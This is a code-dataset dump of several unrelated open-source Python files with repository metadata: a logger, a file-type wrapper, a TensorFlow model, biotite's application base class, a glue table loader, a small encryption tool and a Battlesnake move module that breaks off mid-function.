surajaiswal13/OnlineEDAAutomation
|
a1bfe8b1dee51a4872529a98f6e1136922329e3e
|
[
"MIT"
] | null | null | null |
logger_application/logger.py
|
surajaiswal13/OnlineEDAAutomation
|
a1bfe8b1dee51a4872529a98f6e1136922329e3e
|
[
"MIT"
] | 2
|
2022-02-08T16:35:32.000Z
|
2022-03-04T06:56:54.000Z
|
from datetime import datetime
from src.utils import uploaded_file
import os
class App_Logger:
    """Writes tab-separated, timestamped EDA log lines to a file object."""

    def __init__(self):
        pass

    def log(self, file_object, email, log_message, log_writer_id):
        """Append one line: <email>_eda_<id>  <date>/<time>  <email>  <message>."""
        self.now = datetime.now()
        self.date = self.now.date()
        self.current_time = self.now.strftime("%H:%M:%S")
        stamp = str(self.date) + "/" + str(self.current_time)
        line = (email + "_eda_" + log_writer_id + "\t\t" + stamp
                + "\t\t" + email + "\t\t" + log_message + "\n")
        file_object.write(line)
| 27.888889
| 143
| 0.621514
| 73
| 502
| 4.027397
| 0.465753
| 0.071429
| 0.07483
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.227092
| 502
| 17
| 144
| 29.529412
| 0.757732
| 0
| 0
| 0
| 0
| 0
| 0.055888
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0.083333
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0773947b769d5f943efc051b2beaf2ee562da724
| 1,231
|
py
|
Python
|
AppImageBuilder/commands/file.py
|
gouchi/appimage-builder
|
40e9851c573179e066af116fb906e9cad8099b59
|
[
"MIT"
] | null | null | null |
AppImageBuilder/commands/file.py
|
gouchi/appimage-builder
|
40e9851c573179e066af116fb906e9cad8099b59
|
[
"MIT"
] | null | null | null |
AppImageBuilder/commands/file.py
|
gouchi/appimage-builder
|
40e9851c573179e066af116fb906e9cad8099b59
|
[
"MIT"
] | null | null | null |
# Copyright 2020 Alexis Lopez Zubieta
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
import os
from .command import Command
class FileError(RuntimeError):
    # Raised when the external `file` command exits with a non-zero status.
    pass
class File(Command):
    """Wrapper around the `file` command for inspecting file types."""

    def __init__(self):
        super().__init__('file')
        # Keep the wrapped command quiet; callers consume stdout directly.
        self.log_stdout = False
        self.log_command = False

    def query(self, path):
        """Return brief `file -b` output for *path*.

        Raises FileError (with stderr text) when the command fails.
        """
        self._run(['file', '-b', '--exclude', 'ascii', path])
        if self.return_code != 0:
            raise FileError('\n'.join(self.stderr))
        return '\n'.join(self.stdout)

    def is_executable_elf(self, path):
        """True when `file` reports *path* as an executable ELF binary."""
        description = self.query(path)
        return 'ELF' in description and 'executable' in description
| 31.564103
| 80
| 0.685621
| 166
| 1,231
| 5
| 0.554217
| 0.066265
| 0.031325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005225
| 0.222583
| 1,231
| 38
| 81
| 32.394737
| 0.862069
| 0.490658
| 0
| 0
| 0
| 0
| 0.066775
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0.055556
| 0.111111
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07abdc1f2ef1ad7ab554d9cccaa9f73782091369
| 6,609
|
py
|
Python
|
low_rank_local_connectivity/models/simple_model.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-13T21:48:52.000Z
|
2022-03-13T21:48:52.000Z
|
low_rank_local_connectivity/models/simple_model.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | null | null | null |
low_rank_local_connectivity/models/simple_model.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-30T07:20:29.000Z
|
2022-03-30T07:20:29.000Z
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple model for image classification.
The model is multiple
conv/locally_connected/wide_conv/low_rank_locally_connected layers followed
by a fully connected layer. Changes to the model architecture can be made by
modifying simple_model_config.py file.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import os
import tensorflow.compat.v1 as tf
from low_rank_local_connectivity import layers
from low_rank_local_connectivity import utils
MOMENTUM = 0.9
EPS = 1e-5
class SimpleNetwork(tf.keras.Model):
  """Locally Connected Network."""
  def __init__(self, config, variable_scope='simple_network'):
    """Builds the layer stack described by *config*.

    Args:
      config: simple_model_config-style object; num_filters_list,
        kernel_size_list, strides_list and layer_types must align
        per layer index.
      variable_scope: name prefix used for per-layer variable names.
    """
    super(SimpleNetwork, self).__init__()
    self.variable_scope = variable_scope
    # Deep-copy so mutations below (e.g. padding layer_types) do not
    # leak back into the caller's config object.
    self.config = copy.deepcopy(config)
    filters_list = self.config.num_filters_list
    depth = len(filters_list)
    self.pass_is_training_list = []
    self.layers_list = []
    if self.config.num_channels < 1:
      raise ValueError('num_channels should be > 0')
    input_channels = self.config.num_channels
    if self.config.coord_conv:
      # Add two coordinate conv channels.
      input_channels = input_channels + 2
    # Pad layer_types with plain conv2d so every layer has a type.
    if len(self.config.layer_types) < depth:
      self.config.layer_types.extend(
          ['conv2d'] * (depth - len(self.config.layer_types)))
    # chin/chout track input/output channel counts through the stack.
    chin = input_channels
    for i, (kernel_size, num_filters, strides, layer_type) in enumerate(zip(
        self.config.kernel_size_list,
        filters_list,
        self.config.strides_list,
        self.config.layer_types)):
      padding = 'valid'
      if layer_type == 'conv2d':
        chout = num_filters
        layer = tf.keras.layers.Conv2D(
            filters=chout,
            kernel_size=kernel_size,
            strides=(strides, strides),
            padding=padding,
            activation=None,
            use_bias=not self.config.batch_norm,
            kernel_initializer=self.config.kernel_initializer,
            name=os.path.join(self.variable_scope, 'layer%d' %i, layer_type))
      elif layer_type == 'wide_conv2d':
        # Conv. layer with equivalent params to low rank locally connected.
        if self.config.rank < 1:
          raise ValueError('rank should be > 0 for %s layer.' % layer_type)
        # Channel count chosen to match the parameter count of the
        # low-rank locally connected layer with the same rank.
        chout = int((self.config.rank * chin + num_filters) / float(
            chin + num_filters) * num_filters)
        layer = tf.keras.layers.Conv2D(
            filters=chout if i < (depth-1)
            else int(num_filters * self.config.rank),
            kernel_size=kernel_size, strides=(strides, strides),
            padding=padding,
            activation=None,
            use_bias=not self.config.batch_norm,
            kernel_initializer=self.config.kernel_initializer,
            name=os.path.join(self.variable_scope, 'layer%d' %i, layer_type))
      elif layer_type == 'locally_connected2d':
        # Full locally connected layer.
        chout = num_filters
        layer = tf.keras.layers.LocallyConnected2D(
            filters=chout,
            kernel_size=(kernel_size, kernel_size),
            strides=(strides, strides),
            padding=padding,
            activation=None,
            use_bias=True, # not self.config.batch_norm,
            name=os.path.join(self.variable_scope, 'layer%d' %i, layer_type),
            kernel_initializer=self.config.kernel_initializer)
      elif layer_type == 'low_rank_locally_connected2d':
        if self.config.rank < 1:
          raise ValueError('rank should be > 0 for %s layer.' % layer_type)
        chout = num_filters
        layer = layers.LowRankLocallyConnected2D(
            filters=chout,
            kernel_size=(kernel_size, kernel_size),
            strides=(strides, strides),
            padding=padding,
            activation=None,
            use_bias=not self.config.batch_norm,
            name=os.path.join(self.variable_scope, 'layer%d' %i, layer_type),
            kernel_initializer=self.config.kernel_initializer,
            combining_weights_initializer=(
                self.config.combining_weights_initializer),
            spatial_rank=self.config.rank,
            normalize_weights=self.config.normalize_weights,
            input_dependent=config.input_dependent,
            share_row_combining_weights=self.config.share_row_combining_weights,
            share_col_combining_weights=self.config.share_col_combining_weights)
      else:
        raise ValueError('Can not recognize layer %s type.' % layer_type)
      chin = chout
      self.layers_list.append(layer)
      self.pass_is_training_list.append(False)
      if self.config.batch_norm:
        # Batch norm is the only layer that needs the training flag.
        layer = tf.keras.layers.BatchNormalization(
            trainable=True, momentum=MOMENTUM, epsilon=EPS)
        self.layers_list.append(layer)
        self.pass_is_training_list.append(True)
      layer = tf.keras.layers.ReLU()
      self.layers_list.append(layer)
      self.pass_is_training_list.append(False)
    # Head: spatial reduction followed by a linear classifier.
    if self.config.global_avg_pooling:
      self.layers_list.append(tf.keras.layers.GlobalAveragePooling2D())
    else:
      self.layers_list.append(tf.keras.layers.Flatten())
    self.pass_is_training_list.append(False)
    self.layers_list.append(tf.keras.layers.Dense(
        units=self.config.num_classes, activation=None, use_bias=True,
        name='logits'))
    self.pass_is_training_list.append(False)
  def __call__(self, images, is_training):
    """Runs the network.

    Args:
      images: input image batch; axis 3 is treated as channels (see the
        coord-conv concat below), i.e. NHWC layout.
      is_training: flag forwarded only to layers whose
        pass_is_training_list entry is True (batch norm).

    Returns:
      (logits, endpoints) where endpoints maps 'layer<i>' to each
      intermediate tensor.
    """
    endpoints = {}
    if self.config.coord_conv:
      # Append position channels.
      net = tf.concat([images, utils.position_channels(images)], axis=3)
    else:
      net = images
    for i, (pass_is_training, layer) in enumerate(
        zip(self.pass_is_training_list, self.layers_list)):
      net = layer(net, training=is_training) if pass_is_training else layer(net)
      endpoints['layer%d' % i] = net
      # Register layer updates (e.g. batch-norm moving stats) both in
      # the TF1 collection and on this Model.
      tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, layer.updates)
      self.add_update(layer.updates)
    logits = net
    return logits, endpoints
| 37.982759
| 80
| 0.681192
| 843
| 6,609
| 5.11981
| 0.252669
| 0.07646
| 0.029194
| 0.029194
| 0.40987
| 0.368397
| 0.352641
| 0.305607
| 0.288925
| 0.267609
| 0
| 0.006463
| 0.227417
| 6,609
| 173
| 81
| 38.202312
| 0.838817
| 0.157966
| 0
| 0.373016
| 0
| 0
| 0.045528
| 0.005059
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015873
| false
| 0.071429
| 0.063492
| 0
| 0.095238
| 0.007937
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07dab8d1754575bc1f3f83e4e0cadea3c8dcd3af
| 8,104
|
py
|
Python
|
src/biotite/application/application.py
|
claudejrogers/biotite
|
3635bc9071506ecb85ddd9b1dbe6a430295e060e
|
[
"BSD-3-Clause"
] | null | null | null |
src/biotite/application/application.py
|
claudejrogers/biotite
|
3635bc9071506ecb85ddd9b1dbe6a430295e060e
|
[
"BSD-3-Clause"
] | null | null | null |
src/biotite/application/application.py
|
claudejrogers/biotite
|
3635bc9071506ecb85ddd9b1dbe6a430295e060e
|
[
"BSD-3-Clause"
] | null | null | null |
# This source code is part of the Biotite package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
__name__ = "biotite.application"
__author__ = "Patrick Kunzmann"
__all__ = ["Application", "AppStateError", "TimeoutError", "VersionError",
"AppState", "requires_state"]
import abc
import time
from functools import wraps
from enum import Flag, auto
class AppState(Flag):
    """
    This enum type represents the app states of an application.
    """
    # Lifecycle: CREATED -> RUNNING -> FINISHED -> JOINED, with
    # CANCELLED reachable from RUNNING or FINISHED.  Flag members can
    # be OR-combined in @requires_state checks.
    CREATED = auto()
    RUNNING = auto()
    FINISHED = auto()
    JOINED = auto()
    CANCELLED = auto()
def requires_state(app_state):
    """
    A decorator for methods of :class:`Application` subclasses that
    raises an :class:`AppStateError` in case the method is called, when
    the :class:`Application` is not in the specified :class:`AppState`
    `app_state`.

    Parameters
    ----------
    app_state : AppState
        The required app state.

    Examples
    --------
    Raises :class:`AppStateError` when `function` is called,
    if :class:`Application` is not in one of the specified states:

    >>> @requires_state(AppState.RUNNING | AppState.FINISHED)
    ... def function(self):
    ...     pass
    """
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            # First positional argument of a method is always 'self'.
            instance = args[0]
            if instance._state & app_state:
                return func(*args, **kwargs)
            raise AppStateError(
                f"The application is in {instance.get_app_state()} state, "
                f"but {app_state} state is required"
            )
        return wrapper
    return decorator
class Application(metaclass=abc.ABCMeta):
"""
This class is a wrapper around an external piece of runnable
software in any sense. Subclasses of this abstract base class
specify the respective kind of software and the way of interacting
with it.
Every :class:`Application` runs through a different app states
(instances of enum :class:`AppState`) from its creation until its
termination:
Directly after its instantiation the app is in the *CREATED* state.
In this state further parameters can be set for the application run.
After the user calls the :func:`start()` method, the app state is
set to *RUNNING* and the :class:`Application` type specific
:func:`run()` method is called.
When the application finishes the AppState changes to *FINISHED*.
This is checked via the :class:`Application` type specific
:func:`is_finished()` method.
The user can now call the :func:`join()` method, concluding the
application in the *JOINED* state and making the results of the
application accessible by executing the :class:`Application`
type specific :func:`evaluate()` method.
Furthermore this executes the :class:`Application` type specific
:func:`clean_up()` method.
:func:`join()` can even be called in the *RUNNING* state:
This will constantly check :func:`is_finished()` and will directly
go into the *JOINED* state as soon as the application reaches the
*FINISHED* state.
Calling the :func:`cancel()` method while the application is
*RUNNING* or *FINISHED* leaves the application in the *CANCELLED*
state.
This triggers the :func:`clean_up()` method, too, but there are no
accessible results.
If a method is called in an unsuitable app state, an
:class:`AppStateError` is called.
The application run behaves like an additional thread: Between the
call of :func:`start()` and :func:`join()` other Python code can be
executed, while the application runs in the background.
"""
def __init__(self):
self._state = AppState.CREATED
@requires_state(AppState.CREATED)
def start(self):
"""
Start the application run and set its state to *RUNNING*.
This can only be done from the *CREATED* state.
"""
self.run()
self._start_time = time.time()
self._state = AppState.RUNNING
    @requires_state(AppState.RUNNING | AppState.FINISHED)
    def join(self, timeout=None):
        """
        Conclude the application run and set its state to *JOINED*.
        This can only be done from the *RUNNING* or *FINISHED* state.
        If the application is *FINISHED* the joining process happens
        immediately, if otherwise the application is *RUNNING*, this
        method waits until the application is *FINISHED*.

        Parameters
        ----------
        timeout : float, optional
            If this parameter is specified, the :class:`Application`
            only waits for finishing until this value (in seconds) runs
            out.
            After this time is exceeded a :class:`TimeoutError` is
            raised and the application is cancelled.

        Raises
        ------
        TimeoutError
            If the joining process exceeds the `timeout` value.
        """
        # Poll in wait_interval() steps until the subclass reports
        # completion via is_finished() (checked inside get_app_state()).
        time.sleep(self.wait_interval())
        while self.get_app_state() != AppState.FINISHED:
            # The timeout is measured from the moment start() was called.
            if timeout is not None and time.time()-self._start_time > timeout:
                self.cancel()
                raise TimeoutError(
                    f"The application expired its timeout "
                    f"({timeout:.1f} s)"
                )
            else:
                time.sleep(self.wait_interval())
        # One extra interval after FINISHED before evaluating results.
        time.sleep(self.wait_interval())
        try:
            self.evaluate()
        except AppStateError:
            # Lifecycle violations propagate unchanged.
            raise
        except:
            # Any other evaluation failure leaves the app CANCELLED so
            # results are not considered accessible.
            self._state = AppState.CANCELLED
            raise
        else:
            self._state = AppState.JOINED
        self.clean_up()
    @requires_state(AppState.RUNNING | AppState.FINISHED)
    def cancel(self):
        """
        Cancel the application when in *RUNNING* or *FINISHED* state.

        Triggers :func:`clean_up()`; no results are accessible afterwards.
        """
        self._state = AppState.CANCELLED
        self.clean_up()
def get_app_state(self):
"""
Get the current app state.
Returns
-------
app_state : AppState
The current app state.
"""
if self._state == AppState.RUNNING:
if self.is_finished():
self._state = AppState.FINISHED
return self._state
    @abc.abstractmethod
    def run(self):
        """
        Commence the application run. Called in :func:`start()`.

        PROTECTED: Override when inheriting.
        """
        pass
    @abc.abstractmethod
    def is_finished(self):
        """
        Check if the application has finished.

        PROTECTED: Override when inheriting.

        Returns
        -------
        finished : bool
            True if the application has finished, false otherwise
        """
        pass
    @abc.abstractmethod
    def wait_interval(self):
        """
        The time interval of :func:`is_finished()` calls in the joining
        process.

        PROTECTED: Override when inheriting.

        Returns
        -------
        interval : float
            Time (in seconds) between calls of :func:`is_finished()` in
            :func:`join()`
        """
        pass
    @abc.abstractmethod
    def evaluate(self):
        """
        Evaluate application results. Called in :func:`join()`.

        PROTECTED: Override when inheriting.
        """
        pass
    def clean_up(self):
        """
        Do clean up work after the application terminates.

        Called from both :func:`join()` and :func:`cancel()`.

        PROTECTED: Optionally override when inheriting.
        """
        pass
class AppStateError(Exception):
    """Raised when a method is invoked in an unsuitable app state."""
class TimeoutError(Exception):
    """
    Indicate that the application's timeout expired.

    NOTE(review): this name shadows the built-in ``TimeoutError`` inside
    this module; renaming would break callers that catch it, so it is
    kept as-is.
    """
    pass
class VersionError(Exception):
    """Raised when the application's version is invalid."""
| 31.169231
| 79
| 0.604516
| 918
| 8,104
| 5.269063
| 0.248366
| 0.072359
| 0.024602
| 0.01902
| 0.167666
| 0.096547
| 0.052719
| 0.013645
| 0
| 0
| 0
| 0.000534
| 0.307132
| 8,104
| 260
| 80
| 31.169231
| 0.860908
| 0.538129
| 0
| 0.287356
| 0
| 0
| 0.086515
| 0.009107
| 0
| 0
| 0
| 0
| 0
| 1
| 0.149425
| false
| 0.091954
| 0.045977
| 0
| 0.356322
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07eb8c54a1c0d882798ebdd645e52dda754bb70e
| 759
|
py
|
Python
|
glue/core/data_factories/tables.py
|
rosteen/glue
|
ed71979f8e0e41f993a2363b3b5a8f8c3167a130
|
[
"BSD-3-Clause"
] | 550
|
2015-01-08T13:51:06.000Z
|
2022-03-31T11:54:47.000Z
|
glue/core/data_factories/tables.py
|
mmorys/glue
|
b58ced518ba6f56c59a4e03ffe84afa47235e193
|
[
"BSD-3-Clause"
] | 1,362
|
2015-01-03T19:15:52.000Z
|
2022-03-30T13:23:11.000Z
|
glue/core/data_factories/tables.py
|
mmorys/glue
|
b58ced518ba6f56c59a4e03ffe84afa47235e193
|
[
"BSD-3-Clause"
] | 142
|
2015-01-08T13:08:00.000Z
|
2022-03-18T13:25:57.000Z
|
from glue.core.data_factories.helpers import has_extension
from glue.config import data_factory
__all__ = ['tabular_data']
@data_factory(label="ASCII Table",
              identifier=has_extension('csv txt tsv tbl dat '
                                       'csv.gz txt.gz tbl.bz '
                                       'dat.gz'),
              priority=1)
def tabular_data(path, **kwargs):
    """Load an ASCII table, trying the astropy reader first, then pandas."""
    from glue.core.data_factories.astropy_table import astropy_tabular_data
    from glue.core.data_factories.pandas import pandas_read_table
    for reader in (astropy_tabular_data, pandas_read_table):
        try:
            return reader(path, **kwargs)
        except Exception:
            # This reader could not handle the file -- try the next one.
            continue
    raise IOError("Could not parse file: %s" % path)
| 33
| 75
| 0.613966
| 93
| 759
| 4.774194
| 0.516129
| 0.072072
| 0.081081
| 0.108108
| 0.168919
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001894
| 0.304348
| 759
| 22
| 76
| 34.5
| 0.839015
| 0
| 0
| 0
| 0
| 0
| 0.123847
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.055556
| 0.222222
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07f12eb8f08aef21196193b3111071cb20b8013a
| 1,884
|
py
|
Python
|
silver_bullet/crypto.py
|
Hojung-Jeong/Silver-Bullet-Encryption-Tool
|
5ea29b3cd78cf7488e0cbdcf4ea60d7c9151c2a7
|
[
"Apache-2.0"
] | null | null | null |
silver_bullet/crypto.py
|
Hojung-Jeong/Silver-Bullet-Encryption-Tool
|
5ea29b3cd78cf7488e0cbdcf4ea60d7c9151c2a7
|
[
"Apache-2.0"
] | null | null | null |
silver_bullet/crypto.py
|
Hojung-Jeong/Silver-Bullet-Encryption-Tool
|
5ea29b3cd78cf7488e0cbdcf4ea60d7c9151c2a7
|
[
"Apache-2.0"
] | null | null | null |
'''
>List of functions
1. encrypt(user_input,passphrase) - Encrypt the given string with the given passphrase. Returns cipher text and locked pad.
2. decrypt(cipher_text,locked_pad,passphrase) - Decrypt the cipher text encrypted with SBET. It requires cipher text, locked pad, and passphrase.
'''
# CODE ========================================================================
import zlib
import random
from hashlib import sha1
from silver_bullet.TRNG import trlist
from silver_bullet.contain_value import contain
ascii_value=256  # number of possible byte values; modulus for all pad arithmetic
def ciphering(target_list, pad, decrypt=False):
    """Add (encrypt) or subtract (decrypt) the pad from each value, mod ascii_value.

    On decryption the inputs are numeric strings, hence the int() cast.
    """
    output = []
    for index, key in enumerate(pad):
        if decrypt:
            value = contain(int(target_list[index]) - key, ascii_value)
        else:
            value = contain(target_list[index] + key, ascii_value)
        output.append(value)
    return output
def locker(pad, passphrase):
    """XOR the pad with a passphrase-derived keystream (self-inverse lock/unlock)."""
    cut = round(len(passphrase) / 2)
    halves = [passphrase[:cut], passphrase[cut:]]
    # Build the keystream: seed the PRNG with each passphrase half in turn.
    mask = [0 for _ in range(len(pad))]
    for part in halves:
        seed = sha1(part.encode()).hexdigest()
        random.seed(seed)
        mask = [contain(random.randrange(ascii_value) + previous, ascii_value)
                for previous in mask]
    locked = []
    for index in range(len(pad)):
        locked.append(int(pad[index]) ^ mask[index])
    return locked
def encrypt(user_input, passphrase):
    """Compress and one-time-pad encrypt *user_input*.

    Returns the cipher text and the passphrase-locked pad, both as
    space-separated number strings.
    """
    payload = list(zlib.compress(user_input.encode()))
    pad = trlist(len(payload), ascii_value)
    cipher_nums = ciphering(payload, pad)
    locked_nums = locker(pad, passphrase)
    return ' '.join(map(str, cipher_nums)), ' '.join(map(str, locked_nums))
def decrypt(cipher_text, locked_pad, passphrase):
    """Reverse encrypt(): unlock the pad, strip it off and decompress."""
    cipher_nums = cipher_text.split(' ')
    pad = locker(locked_pad.split(' '), passphrase)
    plain_nums = ciphering(cipher_nums, pad, True)
    return zlib.decompress(bytes(plain_nums)).decode()
| 24.789474
| 146
| 0.735669
| 260
| 1,884
| 5.215385
| 0.323077
| 0.058997
| 0.047198
| 0.056047
| 0.158555
| 0.158555
| 0.054572
| 0
| 0
| 0
| 0
| 0.00536
| 0.108811
| 1,884
| 76
| 147
| 24.789474
| 0.802263
| 0.213907
| 0
| 0.044444
| 0
| 0
| 0.002653
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088889
| false
| 0.155556
| 0.111111
| 0
| 0.288889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07f21adedf8ef7aa0ba52361a9cf4372ad43ac9a
| 4,967
|
py
|
Python
|
app/nextMoveLogic.py
|
thekitbag/starter-snake-python
|
48d12d2fa61ecfc976cd5750316b1db49a641f7f
|
[
"MIT"
] | null | null | null |
app/nextMoveLogic.py
|
thekitbag/starter-snake-python
|
48d12d2fa61ecfc976cd5750316b1db49a641f7f
|
[
"MIT"
] | null | null | null |
app/nextMoveLogic.py
|
thekitbag/starter-snake-python
|
48d12d2fa61ecfc976cd5750316b1db49a641f7f
|
[
"MIT"
] | null | null | null |
import random
class Status(object):
    """Read-only helpers that extract facts from the game-state payload.

    All methods are stateless, so they are proper @staticmethods
    (the originals lacked the decorator and only worked when accessed
    through the class object).
    """

    @staticmethod
    def getHeadPosition(gamedata):
        """Return the head coordinate dict ({'x': ..., 'y': ...}) of our snake."""
        return gamedata['you']['body'][0]

    @staticmethod
    def getMyLength(gamedata):
        """Return the effective snake length.

        At game start the body list holds duplicated copies of the same
        coordinate, which are collapsed here.  Assumes the body list has
        at least three entries -- TODO confirm against the game server.
        """
        body = gamedata['you']['body']
        if body[0] == body[1] == body[2]:
            return 1
        elif body[1] == body[2]:
            return 2
        return len(body)

    @staticmethod
    def getMyDirection(gamedata):
        """Return 'up'/'down'/'left'/'right', or 'none' before the first move."""
        body = gamedata['you']['body']
        if Status.getMyLength(gamedata) == 1:
            return 'none'
        head, neck = body[0], body[1]
        if head['x'] > neck['x']:
            return 'right'
        if head['x'] < neck['x']:
            return 'left'
        if head['x'] == neck['x'] and head['y'] < neck['y']:
            return 'up'
        return 'down'

    @staticmethod
    def getHealth(gamedata):
        """Not implemented yet."""
        pass

    @staticmethod
    def getBoardSize(gamedata):
        """Return {'height': ..., 'width': ...} of the board."""
        board = gamedata['board']
        return {'height': board['height'], 'width': board['width']}

    @staticmethod
    def getFoodPositions(gamedata):
        """Not implemented yet."""
        pass

    @staticmethod
    def getSnakesPositions(gamedata):
        """Not implemented yet."""
        pass
class Assess(object):
    """Situation checks that interpret the board around our snake.

    Methods are stateless, so they are declared @staticmethod (the
    originals lacked the decorator).
    """

    @staticmethod
    def wallProximity(gamedata):
        """Return the snake's relation to a wall, or False if none.

        The result dict has 'type' ('corner' / 'head-on' / 'parallel'),
        an 'identifier' naming the wall(s), and the travel 'direction'.
        """
        head = Status.getHeadPosition(gamedata)
        board_size = Status.getBoardSize(gamedata)
        direction = Status.getMyDirection(gamedata)
        height = board_size['height'] - 1
        width = board_size['width'] - 1
        # Corners: head sits exactly on two walls at once.
        if head['x'] == 0 and head['y'] == 0:
            return {'type': 'corner', 'identifier': 'top left', 'direction': direction}
        elif head['x'] == 0 and head['y'] == height:
            return {'type': 'corner', 'identifier': 'bottom left', 'direction': direction}
        elif head['x'] == width and head['y'] == 0:
            return {'type': 'corner', 'identifier': 'top right', 'direction': direction}
        elif head['x'] == width and head['y'] == height:
            return {'type': 'corner', 'identifier': 'bottom right', 'direction': direction}
        # Head-on: moving straight into a wall.
        elif head['x'] == 0 and direction == 'left':
            return {'type': 'head-on', 'identifier': 'left', 'direction': direction}
        elif head['y'] == 0 and direction == 'up':
            return {'type': 'head-on', 'identifier': 'top', 'direction': direction}
        elif head['x'] == width and direction == 'right':
            return {'type': 'head-on', 'identifier': 'right', 'direction': direction}
        elif head['y'] == height and direction == 'down':
            return {'type': 'head-on', 'identifier': 'bottom', 'direction': direction}
        # Parallel: sliding along a wall.
        elif head['x'] == 0 and direction == 'up' or head['x'] == 0 and direction == 'down':
            return {'type': 'parallel', 'identifier': 'left', 'direction': direction}
        elif head['y'] == 0 and direction == 'right' or head['y'] == 0 and direction == 'left':
            return {'type': 'parallel', 'identifier': 'top', 'direction': direction}
        elif head['x'] == width and direction == 'down' or head['x'] == width and direction == 'up':
            return {'type': 'parallel', 'identifier': 'right', 'direction': direction}
        elif head['y'] == height and direction == 'left' or head['y'] == height and direction == 'right':
            return {'type': 'parallel', 'identifier': 'bottom', 'direction': direction}
        else:
            return False

    @staticmethod
    def ownBodyProximity(gamedata):
        """Not implemented yet."""
        pass

    @staticmethod
    def killPossible(gamedata):
        """Not implemented yet."""
        pass

    @staticmethod
    def smallerSnakeNearby(gamedata):
        """Not implemented yet."""
        pass

    @staticmethod
    def biggerSnakeNearby(gamedata):
        """Not implemented yet."""
        pass

    @staticmethod
    def foodNearby(gamedata):
        """Not implemented yet."""
        pass
class Action(object):
    """Placeholder strategies; all are stubs awaiting implementation."""

    def avoidDeath():
        """Not implemented yet."""

    def chaseFood():
        """Not implemented yet."""

    def fleeSnake():
        """Not implemented yet."""

    def chaseSnake():
        """Not implemented yet."""
class Decision(object):
    """Combines Status and Assess information into the next move."""

    @staticmethod
    def chooseBestOption(gamedata):
        """Return 'up', 'down', 'left' or 'right' for the next move.

        Never reverses into the snake's own neck and steers away from
        walls reported by :func:`Assess.wallProximity`.

        Fixes over the previous version:
        * first move: the random pick is returned immediately instead of
          being overwritten by the invalid value 'none' (and instead of
          crashing on ``options.remove('none')`` in a corner);
        * bottom corners no longer leave ``choice`` unbound (NameError);
        * debug prints removed.
        """
        options = ['up', 'down', 'right', 'left']
        current_direction = Status.getMyDirection(gamedata)
        # First move: no travel direction yet, any option is equally valid.
        if current_direction == 'none':
            return random.choice(options)
        # Never reverse straight into our own neck.
        opposites = {'up': 'down', 'down': 'up', 'left': 'right', 'right': 'left'}
        options.remove(opposites[current_direction])
        proximity = Assess.wallProximity(gamedata)
        if proximity == False:
